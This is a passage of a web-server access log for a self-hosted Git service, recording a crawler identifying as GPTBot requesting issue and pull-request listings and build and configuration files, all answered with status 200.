"https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11182] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:19:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108640] [Gzip 18.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:19:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 109024] [Gzip 18.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:19:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11183] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:19:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 107406] [Gzip 18.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:19:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 